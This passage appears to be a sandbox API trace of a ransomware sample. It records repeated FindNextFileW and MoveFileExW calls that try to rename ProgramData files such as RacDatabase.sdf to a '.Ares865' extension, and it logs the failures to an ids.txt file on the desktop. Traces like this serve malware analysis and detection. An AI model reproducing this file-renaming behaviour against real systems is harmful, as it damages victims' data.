"c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.935] GetLastError () returned 0x20 [0053.935] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 193 [0053.935] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 193 [0053.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.935] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x234a [0053.935] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xc1, lpOverlapped=0x0) returned 1 [0053.935] CloseHandle (hObject=0x12c) returned 1 [0053.936] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.936] CloseHandle (hObject=0x0) returned 0 [0053.936] CloseHandle (hObject=0x0) returned 0 [0053.936] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.936] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.936] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0053.988] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 181 [0053.989] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.989] GetLastError () returned 0x20 [0053.989] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 203 [0053.989] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 203 [0053.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.989] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x240b [0053.989] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xcb, lpOverlapped=0x0) returned 1 [0053.989] CloseHandle (hObject=0x12c) returned 1 [0053.990] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.990] CloseHandle (hObject=0x0) returned 0 [0053.990] CloseHandle (hObject=0x0) returned 0 [0053.990] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0053.991] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 188 [0053.991] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0053.991] GetLastError () returned 0x20 [0053.991] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 210 [0053.991] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 210 [0053.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0053.991] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24d6 [0053.991] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xd2, lpOverlapped=0x0) returned 1 [0053.991] CloseHandle (hObject=0x12c) returned 1 [0053.992] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0053.992] CloseHandle (hObject=0x0) returned 0 [0053.992] CloseHandle (hObject=0x0) returned 0 [0053.992] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0053.992] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0053.992] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2488 [0054.032] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 198 [0054.032] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.032] GetLastError () returned 0x20 [0054.032] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 220 [0054.033] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 220 [0054.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.033] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x25a8 [0054.033] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xdc, lpOverlapped=0x0) returned 1 [0054.033] CloseHandle (hObject=0x12c) returned 1 [0054.034] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.034] CloseHandle (hObject=0x0) returned 0 [0054.034] CloseHandle (hObject=0x0) returned 0 [0054.034] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0054.034] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 205 [0054.034] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.035] GetLastError () returned 0x20 [0054.035] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 227 [0054.035] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 227 [0054.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.035] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2684 [0054.035] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xe3, lpOverlapped=0x0) returned 1 [0054.035] CloseHandle (hObject=0x12c) returned 1 [0054.036] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.036] CloseHandle (hObject=0x0) returned 0 [0054.036] CloseHandle (hObject=0x0) returned 0 [0054.036] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0054.036] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0054.036] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24c8 [0054.074] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 215 [0054.074] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.075] GetLastError () returned 0x20 [0054.075] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 237 [0054.075] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 237 [0054.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.075] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2767 [0054.075] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xed, lpOverlapped=0x0) returned 1 [0054.075] CloseHandle (hObject=0x12c) returned 1 [0054.078] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.078] CloseHandle (hObject=0x0) returned 0 [0054.078] CloseHandle (hObject=0x0) returned 0 [0054.078] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0054.079] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 222 [0054.079] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.079] GetLastError () returned 0x20 [0054.079] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 244 [0054.079] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 244 [0054.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.079] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2854 [0054.079] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xf4, lpOverlapped=0x0) returned 1 [0054.079] CloseHandle (hObject=0x12c) returned 1 [0054.080] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.080] CloseHandle (hObject=0x0) returned 0 [0054.080] CloseHandle (hObject=0x0) returned 0 [0054.080] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0054.080] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0054.080] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24e8 [0054.099] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\* FindFirstFile error 3\r\n") returned 292 [0054.099] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\* FindFirstFile error 3\r\n") returned 292 [0054.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0054.099] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2948 [0054.099] WriteFile (in: hFile=0x15c, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0054.099] CloseHandle (hObject=0x15c) returned 1 [0054.100] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2368 [0054.111] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 232 [0054.111] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.111] GetLastError () returned 0x20 [0054.111] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 254 [0054.111] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 254 [0054.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.112] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2a6c [0054.112] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xfe, lpOverlapped=0x0) returned 1 [0054.112] CloseHandle (hObject=0x12c) returned 1 [0054.112] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.112] CloseHandle (hObject=0x0) returned 0 [0054.112] CloseHandle (hObject=0x0) returned 0 [0054.112] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, 